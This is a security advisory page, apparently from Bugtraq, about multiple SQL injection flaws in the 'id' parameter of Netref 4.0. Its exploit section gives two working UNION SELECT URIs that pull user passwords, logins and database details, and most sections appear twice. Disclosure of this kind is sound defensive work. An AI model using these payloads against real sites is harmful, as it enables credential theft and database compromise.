Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
BID:32725
Info
Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32725 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2008 12:00AM |
| Updated: | Dec 12 2008 04:21PM |
| Credit: | SuB-ZeRo |
| Vulnerable: |
Netref Netref 4.0 |
| Not Vulnerable: | |
Discussion
Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
Netref is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Netref 4.0 is vulnerable; other versions may also be affected.
Netref is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Netref 4.0 is vulnerable; other versions may also be affected.
Exploit / POC
Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.com/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
http://www.example.com/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
Attackers can use a browser to exploit these issues.
The following example URIs and exploit are available:
http://www.example.com/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
http://www.example.com/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
Solution / Fix
Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Netref 'id' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- Star Articles Homepage (Kalptaru Infotech)
- Vendor Homepage (Netref)